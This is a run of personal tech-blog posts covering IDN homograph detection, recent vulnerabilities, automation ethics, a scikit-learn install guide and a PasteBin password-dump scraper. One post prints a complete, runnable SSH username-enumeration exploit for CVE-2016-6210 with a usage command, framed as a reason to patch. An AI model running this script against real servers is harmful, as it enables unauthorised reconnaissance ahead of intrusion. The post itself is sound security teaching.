Programming, Security, Privacy, Technical

A Study in IDN Homograph Attack Detection

A Brief Introduction…

How well do you scrutinize the URLs that you click in a browser? Are you the wild type who clicks links before reading them? Or perhaps you are the cautious type: one of the careful few who hover over a link (without clicking), check the address that appears in the browser bar, and confirm that the site has a valid certificate (which might not mean as much as people think).

Let’s say that you are trying to get to ‘facebook.com’. You see a link and hover over it. The URL that appears in the browser bar says ‘facebook.com’. You click the link, but it takes you to a phishing site.

What happened? You checked the link. It said it was ‘facebook.com’!

You may have fallen victim to an IDN homograph attack. A homograph is a word that looks the same as another but has a different meaning. In the example above, the user clicked a link that looked like ‘facebook.com’ but pointed somewhere else entirely. How can that happen? The ‘how’ comes from the ‘IDN’ portion of the name: ‘internationalized domain name’.

The URL in the address bar is actually pointing to a domain name. A domain name is the human-readable name of a website. The real address of a website (server) is an IP address, but people aren’t great at remembering those, so domain names make them memorable. For example, you can remember ‘facebook.com’ (the domain name) or you can remember ‘31.13.76.68’ (the IP address).

The problem with domain names is that there are many languages. How do you support Mandarin characters in a domain name? Or Russian? You have to internationalize your ‘charset’ (the set of allowed characters, or individual letters). By internationalizing your charset, you now accept a far greater number of characters than just simple English (Latin-based) characters. This lets people have domain names in their own language. But there is a downside: visually similar characters may appear multiple times in the charset under different languages. For example, the Cyrillic and Greek charsets (or alphabets) share characters (letters) similar to those in Latin. These characters have separate identifiers, but look very close, if not identical, to each other.

In the facebook example, the lower-case letter ‘o’ is identified by the character code ‘006F’ in the Latin alphabet (“small letter o”), but could also be ‘03BF’ in the Greek alphabet (“small letter omicron”). If I were to register a domain name of facebook.com but with the Greek version of those letters, it might pass internationalized domain name registration. I could then use this URL to trick people into clicking the link because it will visually look like the real thing. An even simpler example is the substitution of a capital ‘O’ with the number zero (0) in the domain name.
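
To make that concrete, here is a small standalone Python snippet (an illustration only, not part of the project) showing that the two letters compare as different characters even though they render almost identically:

import unicodedata

latin_o = '\u006F'        # Latin small letter o
greek_omicron = '\u03BF'  # Greek small letter omicron

print(unicodedata.name(latin_o))        # LATIN SMALL LETTER O
print(unicodedata.name(greek_omicron))  # GREEK SMALL LETTER OMICRON
print(hex(ord(latin_o)), hex(ord(greek_omicron)))  # 0x6f 0x3bf
print(latin_o == greek_omicron)         # False -- different code points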

I wanted to see if I could detect these types of attacks and flag them using basic statistics.

The Idea…

My idea was quite simple. Each character in a charset can be broken down into its unique identifier (a number), and alphabets (or charsets) are grouped together, so their identifiers will be close together. The plan was to run basic statistical analysis (mean, median, max, min, and standard deviation) on the individual characters of a URL (or domain name). If there are characters outside the usual range, throw a ‘red flag’. I also had to account for the fact that punctuation may throw off the analysis, so there have to be at least a few methods of identifying anomalies — hence the calculation of mean, median, max, min, and standard deviations. I avoided using neural networks for this particular problem, although, as you will see in the summary/future work section, I can see merit in taking it that direction.
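
As a rough sketch of the idea (simplified from what the project actually does), the per-character statistics can be computed directly from the Unicode code points:

import statistics

def char_stats(s):
    # Unicode code point of every character in the string
    codes = [ord(c) for c in s]
    return {
        'min': min(codes),
        'max': max(codes),
        'mean': statistics.mean(codes),
        'median': statistics.median(codes),
        'stdev': statistics.pstdev(codes),
    }

print(char_stats('facebook.com'))
print(char_stats('faceb\u03BF\u03BFk.com'))  # the two 'o's replaced with Greek omicrons

The max, mean, and standard deviation of the second domain jump well outside the Latin range, which is exactly the kind of outlier the model is meant to flag.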

I wanted a basic proof-of-concept system that would take a corpus of known valid URLs and derive a statistical model from them. Then I would use this model to compare new URLs and determine if they are within the same alphabet or if there was a possibility that they were homograph attacks.

The Project…

You can see/fork/download the project code here: https://github.com/calebshortt/homograph_detector

The project is quite simple and has two files in the main ‘base’ package. The ‘meat’ of the system is in the analysis.py file. The ‘results.py’ file was used to manage and compare results.

The flow is as such:

  1. Train the system using either a given string or a file with many strings
  2. Pass the system either a given string or a file with many strings to test
  3. Generate results and output them

The comparison function simply takes the statistics for the given test string and compares them (based on a defined number of standard deviations — default 2) to the model statistics — these are based on mean, median, and the standard deviations themselves (I actually created a metric that is the standard deviation of the standard deviations). It also compares the max and min ranges of the character identifiers — a crude way to check the character-code ranges.

Here is the comparison function code:

def compare(self, str_stats, stdev_threshold=2):
        """
        :param str_stats: ResultSet object
        :param stdev_threshold: (int) number of standard deviations allowed
        :return:
        """

        print('Analysing: Threshold: %s standard deviations...' % stdev_threshold)

        str_max = str_stats.result_max
        str_min = str_stats.result_min
        str_mean = str_stats.mean_means
        str_median = str_stats.mean_medians
        str_stdev = str_stats.mean_stdevs

        if not (self.result_min <= str_min <= str_max <= self.result_max):
            return False, str_stats.all_stats, 'max/min range'

        r_mean_low = self.mean_means - stdev_threshold*self.stdev_means
        r_mean_high = self.mean_means + stdev_threshold*self.stdev_means
        if not (r_mean_low <= str_mean <= r_mean_high):
            return False, str_stats.all_stats, 'mean'

        r_median_low = self.mean_medians - stdev_threshold*self.stdev_medians
        r_median_high = self.mean_medians + stdev_threshold*self.stdev_medians
        if not (r_median_low <= str_median <= r_median_high):
            return False, str_stats.all_stats, 'median'

        r_std_low = self.mean_stdevs - stdev_threshold*self.stdev_stdevs
        r_std_high = self.mean_stdevs + stdev_threshold*self.stdev_stdevs
        if not (r_std_low <= str_stdev <= r_std_high):
            return False, str_stats.all_stats, 'stdev'

        return True, str_stats.all_stats, None

NOTE: The above code compares the given string to the model ResultSet data in ‘self’.

Preliminary Results, Conclusion, and Future Work

The system was able to digest a Latin alphabet-based corpus (included in the source) and correctly identify URLs that had characters from other alphabets in them. The interesting thing about this method is that once the model is generated based on the corpus, it can be recorded and reused — no need to regenerate the model (which took the most time). The system was fast and quite accurate at first glance, although more analysis would be needed to make any real claims on its accuracy.
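
As a minimal sketch of that reuse (assuming the trained model boils down to a handful of plain numbers rather than the project’s actual ResultSet object), the statistics could be persisted to disk and reloaded later without retraining:

import json

# Hypothetical values -- in practice these come from training on the corpus
model = {'result_min': 45, 'result_max': 122, 'mean_means': 104.2,
         'mean_medians': 105.0, 'mean_stdevs': 8.7, 'stdev_means': 3.1,
         'stdev_medians': 3.4, 'stdev_stdevs': 1.2}

with open('model.json', 'w') as f:
    json.dump(model, f)

with open('model.json') as f:
    reloaded = json.load(f)  # ready to compare new URLs against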

My file-load function breaks on some charsets, as they are not covered by the default encoding that Python’s file-loading function assumes (that, or I missed something). I am working to fix this without clobbering the original encoding of the URL (which would defeat the purpose of this experiment).

This is already starting to look like a problem that a neural network would handle nicely. I would like to feed the model stats into an ANN, perhaps with some other inputs, and see how it does. The basic stats I used were able to get decent results, but there are obvious edge cases that standard statistics won’t identify (such as the old ‘substitute the 0 (zero) for a capital O’ trick). A neural network may help catch those.

I would say that it is quite possible to identify IDN homograph attacks using basic statistics and there are a few paths forward to improve accuracy with the results already demonstrated. With that said, nothing will compare to the standard ‘look before you click’ mentality. Users who identify the ‘0 instead of O’ substitution will not leave as much to chance. Systems like these aren’t catch-alls.

Programming, Security, Privacy, Technical

Growing Threats, Growing Attack Surface

It has been an interesting year of breaches, vulnerabilities, and scares: from the recent ROCA vulnerability in Infineon’s TPMs, a module widely used in the smart card industry, to the less-exploitable-but-still-serious KRACK vulnerability that makes attacks on the WPA2 Wi-Fi security protocol possible, to the supply chain attack on CCleaner, a popular utility program for cleaning up a user’s computer.

What is clearly emerging from such events is that there is still much work to be done in the security space. The Ixia Security Report for 2017 describes an increase in the amount of malware and an increase in the size of companies’ attack surfaces. The attack surface is the exposed, or public-facing, “surface area” of a company. Some have attributed the increase in attack surface to increased usage and misconfiguration of cloud infrastructure. They argue that misconfiguration of servers looks to be replacing some of the more traditional OWASP Top 10 vulnerabilities — such as SQL injection.

 

But the vulnerabilities listed above (ROCA, KRACK, and the CCleaner supply chain attack) aren’t necessarily cloud-related.

ROCA relates to an incorrectly-implemented software library — specifically the key pair generation. It allows an attacker to recover the private (secret) key from nothing more than the public key. Modern encryption relies on a public key (which is sent to whoever wants it) and a secret (private) key that only the owner has and that is used to decrypt messages. Only the private key can decrypt messages to the owner. This vulnerability allows anyone with the public key and some decent computational power (say, an AWS cluster used to number-crunch) to derive the original private key and decrypt the messages sent to the owner. The computational power required is in the realm of “expensive but possible”: a targeted attack is a very real possibility, but widespread breaching would be infeasible.

KRACK involves a replay attack. “By repeatedly resetting the nonce transmitted in the third step of the WPA2 handshake, an attacker can gradually match encrypted packets seen before and learn the full keychain used to encrypt the traffic”. This vulnerability requires a physical component, as the attacker has to be on the Wi-Fi network. The cause is inherent to the standard — which means all correctly-implemented versions of the standard are vulnerable (i.e. libraries that implemented it to spec). Many security practitioners have taken this particular moment to point out that using a Virtual Private Network (VPN) would mitigate such attacks, and that Wi-Fi should be treated as an untrusted medium to begin with.

The CCleaner supply chain attack involved an injection of malware into a library that is used in the implementation of CCleaner. When the CCleaner program is packaged and deployed, it includes this third-party library in its package. This type of attack takes advantage of consumers’ trust in CCleaner, and it is becoming a more popular technique among attackers. For the record, CCleaner has been sanitized and is no longer a threat from this malware. I imagine Avast, the company that offers CCleaner, also took a look at its supply chain trust and revamped some policies around it.

 

Each of these attacks is in addition to the general increase in attack surface and the misconfiguration of servers (which is becoming more common). Supply chain attacks are increasing because they clearly work. There are plenty of incorrect implementations of standards or protocols that attackers can take advantage of. Far less often, there are errors in the standard or protocol itself.

It may seem like the odds are piled against an organization’s security team. They are. That is why security is not only the responsibility of the security team, but of the entire organization: from the executives, to the developers (who choose which libraries to implement in their software), to the tech support teams that are often on the “front line” with customers.

Education is always a good first step.

General, Programming

Software Development, Morality, ‘The Secret Life of Walter Mitty’, and Victor Frankenstein

For those who haven’t watched ‘The Secret Life of Walter Mitty’, I highly recommend a viewing. It follows Walter Mitty, a daydreaming “negative asset manager” at LIFE magazine during its conversion to a fully-online offering. It truly is a visually stunning work.

The opening premise, LIFE magazine moving online and the inevitable downsizing and layoffs, struck a chord that has been, and still is, resonating: is there a place for morality in software developers’ drive toward automation and efficiency?

One would be quite right in saying that the issue of ‘worker layoffs due to automation’ is not a new problem. History is full of examples. What piques my interest, however, is the generality of software automation. The immense reach of software naturally leads to an immense number of avenues for automation.

For example: I found myself talking with a colleague about the problems he was having with some of his staff. When we finally distilled the problem down to its essence, we discovered that a great portion of his department was dedicated to the handling and sorting of files (originally electronic, then printed, then sorted and filed). I found myself flippantly stating that I could replace most of his department with a script.

My watching of ‘Walter Mitty’ sparked a wave of introspection, and a single question welled within me: If I could write a script that replaces an entire department, should I?

The script would increase the company’s efficiency through a significant reduction in cost. But why is efficiency so important that one would look for ways to terminate the employment of others? Who benefits from it? Recently, it seems, the cost savings would not make their way to the remaining employees but would manifest as bonuses for an executive or manager, or perhaps dividends for shareholders.

Is inefficiency really that bad? In this case a department is being employed to do work. They are doing the work satisfactorily. Their wages pay for local food, rent, and expenses. This provides a boon to the local economy. If the populace is scraping by financially, they surely will not be purchasing cars, houses, or other ‘big ticket items’. Would this not stagnate the greater economy?

Would a 100%-efficient company have anyone working there?

My authorship of this script directly instigates the termination of those employees. The causative relationship is undeniable.

Such scenarios are drenched in hubris, as such mechanisms are en route to replacing developers as well. In this we are the architects of our own obsolescence and ultimate demise: Dr. Frankenstein would surely have words with us. It is pure arrogance to assume such devices would not also be applied to our own craft.

Some may argue that apparatuses are in place to mitigate such effects, or that the evolution of the market warrants the employees’ termination: ‘They have become obsolete and must retool to stay competitive’, or ‘that is what welfare is for’, or ‘universal basic income is the future for this very reason’. Such comments do not address my question (‘If one could write a script to replace a large group of people’s jobs, should they?’); rather they address the symptom, or after-effects, of such a decision: the employees are terminated, now what?

Perhaps this is the issue?

At the risk of sounding defensive I must note that I am not one to resist change. Resistance to change in our particular field is a doomed prospect to say the least. But one must address the social and economic implications of their decisions. One must have a conscience.

I do not have an answer. The creation of software is a technical achievement, a work of art, a labor of love, and wildly creative. It behooves those who embark on such journeys to consider their implications. Perhaps it is our hubristic tendencies as developers, or our arrogance, that drives us to construct our own monsters. Dr. Frankenstein would surely have words with us.

 

Programming, Security, Privacy, Technical

A Look At Using Discovered Exploits

There are usually two general steps for a software exploit to be created.

The first step is the vulnerability discovery. This is the harder of the two steps. It requires in-depth knowledge of the target software, device, or protocol and a creative mind that is tuned to edge cases and exceptions.

The second step is the exploitation of the discovered vulnerability. This requires the developer to take the vulnerability description and write a module or script that takes advantage of it.

This article will address the second step: Exploit creation.

First, where do we find vulnerabilities for software if we do not discover them ourselves? There are online databases that store published vulnerabilities (and may include example code) in a searchable format. A few examples are CVE, Exploit-DB, and the NVD.

Looking through these databases we will see that all published vulnerabilities have a unique CVE identifier. They uniquely identify each vulnerability that has been discovered and confirmed. Using the databases we can search for potential vulnerabilities of a particular target (Note: This is similar to what a bot might try, after it has scanned a new target server, to find any published vulnerabilities).

Some vulnerability descriptions may even include sample code — such as CVE-2016-6210. This makes it trivial to write a script that utilizes the vulnerability. For example, we could take the code given to us in CVE-2016-6210 and expand it into a command-line script that takes a list of known usernames and tries each one… which is exactly the vulnerability the CVE describes: “SSH Username Enumeration Vulnerability”.

This script will not breach the system, but what it will do is try to find valid usernames via SSH. This vulnerability may lead to, or become part of, a larger attack. It is important to patch all discovered vulnerabilities as you don’t know how an adversary will try to attack your system.

Given the sample code, here is our improved version:


import paramiko
import time
import argparse
import logging

logging.basicConfig()

class Engine(object):
    file_path = None
    target = ''
    userlist = ['root']
    calc_times = []

    req_time = 0.0
    num_pools = 10

    def __init__(self, target, filepath=None, req_time=0.0):
        self.req_time = req_time
        self.target = target
        self.file_path = filepath
        if self.file_path:
            self.load_users(filepath)

    def load_users(self, filepath):
        data = []
        with open(filepath, 'r') as f:
            data = f.read().splitlines()
        self.userlist = data

    def partition_list(self, p_list):
        p_size = len(p_list) / self.num_pools
        for i in xrange(0, len(p_list), p_size):
            yield p_list[i:i+p_size]

    def execute(self):
        for user in self.userlist:
            self.test_with_user(user)

    def test_with_user(self, user):
        # CVE-2016-6210: with a very long password, a failed login for a valid
        # username takes measurably longer than one for an invalid username.
        p = 'A' * 25000
        ssh = paramiko.SSHClient()
        start_time = time.clock()
        ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        end_time = time.clock()
        try:
            ssh.connect(self.target, username=user, password=p)
        except:
            end_time = time.clock()
        total = end_time - start_time
        self.calc_times.append(total)
        avg = reduce(lambda x, y: x + y, self.calc_times) / len(self.calc_times)
        flag = '*' if total > avg else ''
        print('%s:\t\t%s\t%s' % (user, total, flag))
        time.sleep(self.req_time)
        ssh.close()

def main(ip_addr, filename=None, req_time=0.0):
    if ip_addr == '' or not ip_addr:
        print('No target IP specified')
        return
    if filename == '':
        filename = None
    engine = Engine(target=ip_addr, filepath=filename, req_time=req_time)
    engine.execute()

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='Simple automated script for CVE-2016-6210 -- OpenSSHD version <= 7.2p2')
    parser.add_argument('ip', help='[Required] The IP of the target server')
    parser.add_argument('-u', '--userlist', help='Specify a filepath with a list of usernames to try -- one username per line')
    parser.add_argument('-t', '--time', help='Set the time between requests (in seconds)')
    ip_addr = None
    filename = None
    req_time = 0.0
    args = parser.parse_args()

    if args.ip:
        ip_addr = args.ip
    if args.userlist:
        filename = args.userlist
    if args.time:
        req_time = float(args.time)
    main(ip_addr, filename, req_time)
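
Assuming the script above is saved as, say, ssh_enum.py (the filename is arbitrary), it could be run against a lab machine like this:

python ssh_enum.py 192.0.2.10 -u usernames.txt -t 0.5

Usernames whose failed-login timing stands out above the running average are flagged with an asterisk in the output.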

 

It is much easier to write exploits for already-discovered vulnerabilities than it is to discover them yourself.

This is why it is vital that system admins keep their servers and software up to date.

 

 

 

Programming, Technical, Uncategorized

Installing scikit-learn; Python Data Mining Library

Update: The instructions in this post are for Python 2.7. If you are using Python 3, the process is much simpler. The short version follows.

Starting with a Python 3.6 environment (with Python and pip already installed):

  1. Install numpy: pip install numpy
  2. Install scipy: pip install scipy
  3. Install sklearn: pip install sklearn

Test installation by opening a python interpreter and importing sklearn:
python
import sklearn

If it successfully imports (no errors), then sklearn is installed correctly.
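
An optional, slightly more informative check prints the installed version in one line:

python -c "import sklearn; print(sklearn.__version__)"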

Introduction

Scikit-learn is a great data mining library for Python. It provides a powerful array of tools to classify, cluster, reduce, select, and so much more. I first encountered scikit-learn when I was developing prototypes for my first business venture. I wanted to use something that was easy and powerful. Scikit-learn was just that tool.

The only problem with scikit-learn is that it builds off of some powerful-yet-finicky libraries, and you will need to install those libraries, NumPy and SciPy, before you can proceed with installing scikit-learn.

To a novice, this can be a frustrating task since the order of installation matters and many Google searches will only produce unhelpful and long-winded responses. Thus, my motivation to set the record straight and provide a quick tutorial on how to install scikit-learn — mostly on Windows, but I have provided links and notes on both Linux and Mac installations as well.

In the process of this tutorial, you will install (or already have) the following — in this order:

  1. Python (https://www.python.org/downloads/)
  2. NumPy (http://sourceforge.net/projects/numpy/files/NumPy/1.10.2/)
  3. SciPy (http://sourceforge.net/projects/scipy/files/scipy/0.16.1/)
  4. Pip (https://pip.pypa.io/en/stable/installing/)
  5. scikit-learn (http://scikit-learn.org/stable/install.html)

NOTE: I have provided the links unlabeled above because, like all tech/installation tutorials, over time they become obsolete. By providing the links as they are, it is my hope that even if new versions come out, you will be able to use this tutorial to find the resources you need.

Step 1: Install Python

If you do not already have Python, install it now from the address provided above (https://www.python.org/downloads/). I will be using Python 2.7 for this tutorial.

The installer for Python is quick and straightforward. Once installed, we will need to check that Python is available on the command line. Open a terminal by searching for ‘cmd’ or running C:\Windows\System32\cmd.exe. I would recommend creating a shortcut if you are doing this a lot.

In the command line, enter:

python --version

Something similar to “Python 2.7.6” should display. That shows that Python is working and accessible from the command line.

Step 2: Install NumPy

NumPy is a powerful library for Python that contains advanced numerical capabilities.

Install NumPy by downloading the correct installer using the link provided above (http://sourceforge.net/projects/numpy/files/NumPy/1.10.2/) then run the installer.

NOTE: There are a few installers based on your OS version AND the version of Python you have. It is important that you find the right installer for your OS and Python version!

Step 3: Install SciPy

Download the SciPy installer using the link provided above (http://sourceforge.net/projects/scipy/files/scipy/0.16.1/) and run it.

NOTE: There are a few installers based on your OS version AND the version of Python you have. It is important that you find the right installer for your OS and Python version!

Step 4: Install Pip

Pip is a package manager specifically for Python. It comes in handy so often that I highly recommend installing it to help manage Python packages.

Go to the link provided above (https://pip.pypa.io/en/stable/installing/).

The easiest way to install pip on Windows is by using the ‘get_pip.py’ script and then running it in your command line:

python get_pip.py

If you are on Linux you can use apt-get (or whatever package manager you have):

sudo apt-get install python-pip

Step 5: Install scikit-learn

NOTE: More information on installing scikit-learn at the link provided above (http://scikit-learn.org/stable/install.html)

On Windows: use pip to install scikit-learn:

pip install scikit-learn

On Linux: Use the package manager or follow the build instructions at http://www.bogotobogo.com/python/scikit-learn/scikit-learn_install.php

Step 6: Test Installation

Now we must see if everything installed correctly. Open up a command line terminal and type:

python

This will open a python interpreter. You will know this because there will be some text and three chevrons, “>>>”, prompting input. Type:

import sklearn

If nothing happens and another prompt appears, scikit-learn has been installed correctly.

If an error occurs, there might have been a misstep in the process. Go back through the tutorial to see if any steps were missed, or follow the error message that was given.

Programming, Technical

An Experiment on PasteBin

A while ago I was browsing the public pastes on PasteBin and I came across a few e-mail/password dumps from either malware or some hacker trying to make a name for himself.

As I perused the information, I was shocked to find usernames, emails, passwords, social security numbers, credit card numbers, and more in these dumps. I reported the posts, as credit card info and SSNs are nothing to trifle with, but the thought lingered as to why they were public in the first place. There must be a way to automate the process of reporting these posts, I thought; usernames and especially passwords carry a fairly distinctive signature: at least one upper-case letter, at least one lower-case letter, at least one digit, and a length of at least 8 characters.

How many words in the English language have that particular combination?

This question inevitably led to an experiment.

The parameters were quite simple: how accurately can I identify a password that is surrounded by junk text in a post?
This is actually harder than it seems, as we can’t simply assume that the posts will be in English, or that they will be in a human language at all (they may be code). This presented an interesting problem to work with, and I started development of a framework to solve it.

The solution

The system to test my question is quite simple. It includes a web page scraper and an analysis engine.

The scraper is simple enough: it goes to PasteBin’s public post archive and pulls all of the links to “pastes” contained therein. It then grabs only the paste text from each page and adds it to a list. This list is sent to the analysis engine.

The analysis engine uses a spam filter-like merit score to help identify interesting pastes and discard pastes that do not have anything interesting in them.

It uses a series of filters to affect the merit score:

The first one is simple password identification. It uses a master list of popular passwords and searches each paste for them. If one of these passwords is found, the paste’s merit score is increased.

The second filter is keyword identification. This is similar to the password identification but it includes words and phrases that are not passwords but might signal a paste that is more likely to have passwords in it. These keywords are held in a dictionary that also stores the associated merit value (positive or negative).
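
Hypothetically (these particular words and weights are made up for illustration; the real list lives in the project), such a dictionary might look like this:

KEYWORD_MERIT = {
    'password': 5,      # strong signal of a credential dump
    'dump': 3,
    'credentials': 3,
    'lorem ipsum': -4,  # filler text, almost certainly not a dump
}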

The third filter applies the basic password rules (a rough sketch of this check follows the list):

  • Must have at least one capital letter
  • Must have at least one lower-case letter
  • Must have at least one digit
  • Must be at least 8 characters long
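
A minimal sketch of that rule check, assuming we test individual whitespace-separated tokens from the paste, might look like this:

import re

# At least one upper-case letter, one lower-case letter, one digit, 8+ characters
PASSWORD_RULES = re.compile(r'^(?=.*[A-Z])(?=.*[a-z])(?=.*\d).{8,}$')

def looks_like_password(token):
    return bool(PASSWORD_RULES.match(token))

print(looks_like_password('Tr0ub4dor&3'))  # True
print(looks_like_password('helloworld'))   # False -- no capital, no digit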

The analysis engine then returns a list of all of the links sorted by “most likely to have a password” — highest probability at the top.

Results and Conclusion

I initially found that the filters I had created were getting fewer false positives than the basic password filter (#3) alone, but still weren’t producing promising results. The accuracy of the identification would have to be improved before I attempted any sort of automation for reporting. So I have open-sourced the software and made it available on pip (as it is written in Python):

The project is called “Pastebin Password Scraper” or PBPWScraper:

Here is the PBPWScraper Github

You can use pip to install the latest release version of the library by entering:

pip install PBPWScraper

It was an interesting experiment and it is fun to tweak the filters to improve certain aspects of the analysis. I will continue to work on the system and see if I am able to decrease its false-positive count enough to warrant an automated reporting module.
